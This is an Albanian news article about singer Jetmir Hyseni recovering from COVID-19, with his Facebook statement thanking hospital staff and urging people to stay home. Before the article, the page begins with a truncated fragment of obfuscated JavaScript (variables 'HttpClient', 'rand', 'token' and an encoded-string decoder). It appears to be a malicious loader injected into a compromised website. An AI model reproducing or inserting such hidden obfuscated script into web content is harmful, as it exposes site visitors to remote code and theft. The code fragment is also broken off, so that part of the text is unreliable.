;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Këngëtari kosovar shërohet nga koronavirusi dhe flet për eksperiencën e tij

By

Jetmir Hyseni këngëtari nga fshati Bibaj ka 23 ditë që po qëndronte në Repartin Infektiv në QKUK, dhe të gjithë eksperiencën e tij e bëri publike në llogarinë e tij në Facebook.

Sot me anë të një deklaratë në rrjetin social bëri të ditur që  ishte shëruar nga koronavirusi pasi testet që kishte bërë dje e sot kishin rezultuar negative.

Si rrjedhojë ai ishte liruar nga qendra e trajtimit dhe tani gjendet në shtëpi ku ende do të vazhdojë izolimin.

Ndonëse këngëtari arriti të shërohet nga sëmundja ai dëshiron të potencojë se nuk ishte dicka e lehtë për ta kaluar dhe se kishte goditur rëndë shëndetin e tij këto javë.

Lexoni të plotë deklaratën e këngëtarit:

COVID-19 REZULTATI NEGATIV

Pershendetje të dashur qytetarë të Republikës,

Unë sot përfundimisht,mbas plotë 23 dit qendrimi në Repartin Infektiv në QKUK,me vullnetin e Zotit, në dy testet e bëra, dje dhe sot, rezultova negativ.

Dua t’ju bëj me dije se ky virus më ka shkaktuar mundime, temperaturë të lartë dhe ethe të papërshkrueshme, pneumoni që u konfirmua me anë të rentgenit dhe testit të gjakut. Mos i ndëgjoni ata që thonë “Hajt se s’osht kurrgjo, grip hesapi”. Nuk po them të bëni panik, por mos e neglizhoni. RRINI N’SHPI!

Dua t’ju them të gjithë atyre që me fjalë plot helm flasin keq për stafin shëndetsor, ta kenë frikë Zotin, sepse kurrë hakut nuk mund t’u dalim. Gjat qëndrimit tim ketu,një infermiere rezultoi pozitiv, nga shkaku që e ka harruar veten duke u kujdesur parreshtur për neve pacientëve të prekur me Covid-19.Zoti e shëroftë sa më shpejt!

Kujdesin e mjekëve, teknikëve dhe infermiereve ndaj pacientëve e vlerësoj në superlativ.

Pas shuarjes së kësaj epidemie, pas kthimit në normalitet, do ti vizitoj të gjithë këta heronjë, do ua puth duart me përulësi e respekt dhe t’u them se u jam borgjli përjetë! Këta janë miqtë e mi të përjetshëm. Ju nuk e keni idenë se sa të kujdesshëm janë! Mos folni keq për ata sepse bëni shumë mëkat! Respektoni dhe duani ata! Me zemër dhe përulësisht u them FALEMINDERIT dhe ZOTI JU SHPËRBLEFTË!

Falemnderit familjarëve e miqve që më kanë kontaktuar dhe ma kanë lehtësuar dhimbjen e mërzinë!

Unë po kthehem në shtëpi! Do të qëndroj në izolim si mbarë populli.

Jam mërzitur shumë për prindërit, fëmijtë mi, bashkëshorten time,vellaun tim dhe gjith miqtë e mi, por unë do të qëndroj fizikisht pa miqtë e mi, deri në largimin e plotë të pandemisë dhe deri sa shteti të konkludon se lejohen kontaktet fizike.

Unë shpresoj shumë që së bashku të festojmë kur të vijnë ditë më të mira. Deri atëherë do t’u këndoj njerëzve të shtëpisë dhe juve miq në rrjetet sociale. Distancimi mbetet vetëm fizik, por jo edhe social.

DASHNI E RESPEKT!

RRINI N’SHPI!

JETMIR HYSENI

Bibaj,Ferizaj

Artikuj të ngjashëm